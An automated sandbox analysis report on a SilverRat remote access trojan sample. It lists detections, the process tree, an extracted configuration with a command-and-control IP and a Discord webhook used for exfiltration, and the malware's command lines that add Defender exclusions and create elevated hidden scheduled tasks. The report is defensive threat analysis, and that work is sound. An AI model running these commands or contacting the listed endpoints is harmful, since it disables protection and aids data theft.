
Windows Analysis Report
YDW0S5K7hi.exe

Overview

General Information

Sample name: YDW0S5K7hi.exe (renamed because original name is a hash value)
Original sample name: 078f2f65179647c8a6af688be140138eae827e1f.exe
Analysis ID: 1555421
MD5: fe4ee341b4e7e0d03e27893bd6070a3e
SHA1: 078f2f65179647c8a6af688be140138eae827e1f
SHA256: fd32b776edd0656ad550b2a4981897515f5f2c793eb3d80da8fcd04f98b12222
Tags: exe, silverrat, user-NDA0E

Detection

SilverRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected SilverRat
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • YDW0S5K7hi.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\YDW0S5K7hi.exe" MD5: FE4EE341B4E7E0D03E27893BD6070A3E)
    • attrib.exe (PID: 7808 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7836 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7964 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • $77HelpPanel.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" MD5: FE4EE341B4E7E0D03E27893BD6070A3E)
        • schtasks.exe (PID: 8092 cmdline: "schtasks.exe" /query /TN $77HelpPanel.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8140 cmdline: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8188 cmdline: "schtasks.exe" /query /TN $77HelpPanel.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 4784 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7400 cmdline: "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • $77HelpPanel.exe (PID: 2608 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "\$77HelpPanel.exe" /AsAdmin MD5: FE4EE341B4E7E0D03E27893BD6070A3E)
  • cleanup
{"Mutex": "SilverMutex_RxWYRpnqXs", "Host": "109.120.138.54", "Port": "9999", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT"}
Source | Rule | Description | Author | Strings
YDW0S5K7hi.exe | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |
00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |
00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |
Process Memory Space: YDW0S5K7hi.exe PID: 7600 | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |
0.0.YDW0S5K7hi.exe.4b0000.0.unpack | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |
0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |
0.2.YDW0S5K7hi.exe.3e30b40.0.unpack | JoeSecurity_SilverRat | Yara detected SilverRat | Joe Security |

                  System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe", ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7328, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\YDW0S5K7hi.exe, ProcessId: 7600, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe", ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, ProcessId: 8140, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe", ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, ParentProcessId: 7992, ParentProcessName: $77HelpPanel.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7328, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T21:11:36.230576+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.7 | 49781 | TCP
2024-11-13T21:12:14.628423+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.7 | 49981 | TCP


                  AV Detection

Source: YDW0S5K7hi.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Avira: detection malicious, Label: HEUR/AGEN.1313069
Source: YDW0S5K7hi.exe | Malware Configuration Extractor: SilverRat {"Mutex": "SilverMutex_RxWYRpnqXs", "Host": "109.120.138.54", "Port": "9999", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT"}
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | ReversingLabs: Detection: 60%
Source: YDW0S5K7hi.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Joe Sandbox ML: detected
Source: YDW0S5K7hi.exe | Joe Sandbox ML: detected
Source: YDW0S5K7hi.exe | String decryptor: -|S.S.S|-
Source: YDW0S5K7hi.exe | String decryptor: 109.120.138.54
Source: YDW0S5K7hi.exe | String decryptor: 9999
Source: YDW0S5K7hi.exe | String decryptor: https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT
Source: YDW0S5K7hi.exe | String decryptor: https://g.top4top.io/p_2522c7w8u1.png
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49760 version: TLS 1.2
Source: YDW0S5K7hi.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global traffic | TCP traffic: 192.168.2.7:49766 -> 109.120.138.54:9999
Source: global traffic | HTTP traffic detected:
POST /api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 414
Expect: 100-continue
Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 162.159.137.232
Source: Joe Sandbox View | ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49981
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49781
Source: unknown | TCP traffic detected without corresponding DNS query: 109.120.138.54
Source: global traffic | DNS traffic detected: DNS query: time.windows.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected:
POST /api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPT HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 414
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Wed, 13 Nov 2024 20:11:31 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1731528693
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qW73MYqKH3Z90xhdPmQ0gadTnrC5LwF78B4rIcEsGOBbKbFt5FAb7TF5TB%2BsfAtRkkv1IVWKnXI3t893J9JuotwNXlvOJgP4slxxcpgwFU6R9JN9Q78YJOhN3NrE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=4dda201f464c81e917efe784742ecb12015cec99-1731528691; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=27Y0rH0vNJF3OpOz3GsOUjHcHWN1QbZUj3jzzy7z4Gc-1731528691632-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8e2169518d364630-DFW

{"message": "Unknown Webhook", "code": 10015}
Source: $77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: YDW0S5K7hi.exe, 00000000.00000002.1404296493.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, $77HelpPanel.exe, 0000000A.00000002.2615038791.00000000039A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: $77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003A84000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4
Source: $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.top4top.io/p_2522c7w8u
Source: $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.top4top.io/p_2522c7w8u1.png
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49760 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: YDW0S5K7hi.exe, type: SAMPLE
Source: Yara match | File source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED
Source: YDW0S5K7hi.exe, Keyloaggr.cs | .Net Code: KeyboardLayout
Source: $77HelpPanel.exe.0.dr, Keyloaggr.cs | .Net Code: KeyboardLayout
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Code function: 0_2_00007FFAAB402F09 NtSetValueKey
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Code function: 10_2_00007FFAAB417DF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Code function: 10_2_00007FFAAB417046
Source: $77HelpPanel.exe.0.dr | Static PE information: No import functions for PE file found
Source: YDW0S5K7hi.exe | Static PE information: No import functions for PE file found
Source: YDW0S5K7hi.exe, 00000000.00000000.1355727860.00000000004BE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamejhjt2.exe4 vs YDW0S5K7hi.exe
Source: YDW0S5K7hi.exe, 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamejhjt2.exe4 vs YDW0S5K7hi.exe
Source: YDW0S5K7hi.exe | Binary or memory string: OriginalFilenamejhjt2.exe4 vs YDW0S5K7hi.exe
Source: YDW0S5K7hi.exe, Settings.cs | Cryptographic APIs: 'CreateDecryptor'
Source: $77HelpPanel.exe.0.dr, Settings.cs | Cryptographic APIs: 'CreateDecryptor'
Source: YDW0S5K7hi.exe, Settings.cs | Task registration methods: 'CreateShTasks'
Source: $77HelpPanel.exe.0.dr, Settings.cs | Task registration methods: 'CreateShTasks'
Source: YDW0S5K7hi.exe, Settings.cs | Base64 encoded string: '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', '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', 'gcNMT5J3vCu7nOJR1C15TWa5Qxg+cCorVHQ5w+nihL26aqhmBCu4Tj/SUTeDcKFfK0OxIQrxe1XCWFafRGDQMe562nsPadbBetXfqHAibNPmwCUOEEPAdwDB0ce8mSpcGb5EZhhezD/PZT6RcB9sC2kSXf2dEtoJoJsQrhr912I=', 'XX4Iz5kAK/EAkTqnGs7iFMG9nBFshn90zyvdo/rg7Bn+3lPgEwqvKSsalPTz/JNq'
Source: YDW0S5K7hi.exe, Installation.cs | Base64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
Source: YDW0S5K7hi.exe, MessageRead.cs | Base64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
Source: $77HelpPanel.exe.0.dr, Settings.cs | Base64 encoded string: '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', 'MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==', 'gcNMT5J3vCu7nOJR1C15TWa5Qxg+cCorVHQ5w+nihL26aqhmBCu4Tj/SUTeDcKFfK0OxIQrxe1XCWFafRGDQMe562nsPadbBetXfqHAibNPmwCUOEEPAdwDB0ce8mSpcGb5EZhhezD/PZT6RcB9sC2kSXf2dEtoJoJsQrhr912I=', 'XX4Iz5kAK/EAkTqnGs7iFMG9nBFshn90zyvdo/rg7Bn+3lPgEwqvKSsalPTz/JNq'
                  Source: $77HelpPanel.exe.0.dr, Installation.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
                  Source: $77HelpPanel.exe.0.dr, MessageRead.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
                  Source: $77HelpPanel.exe.0.dr, Installation.csSecurity API names: File.GetAccessControl
                  Source: $77HelpPanel.exe.0.dr, Installation.csSecurity API names: File.SetAccessControl
                  Source: $77HelpPanel.exe.0.dr, Installation.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: $77HelpPanel.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: $77HelpPanel.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: YDW0S5K7hi.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: YDW0S5K7hi.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: YDW0S5K7hi.exe, Installation.csSecurity API names: File.GetAccessControl
                  Source: YDW0S5K7hi.exe, Installation.csSecurity API names: File.SetAccessControl
                  Source: YDW0S5K7hi.exe, Installation.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@32/10@2/2
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\YDW0S5K7hi.exe.log
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Mutant created: \Sessions\1\BaseNamedObjects\SilverMutex_RxWYRpnqXs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | File created: C:\Users\user\AppData\Local\Temp\tmp9C90.tmp
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
Source: YDW0S5K7hi.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: YDW0S5K7hi.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | File read: C:\Users\user\Desktop\YDW0S5K7hi.exe
Source: unknown | Process created: C:\Users\user\Desktop\YDW0S5K7hi.exe "C:\Users\user\Desktop\YDW0S5K7hi.exe"
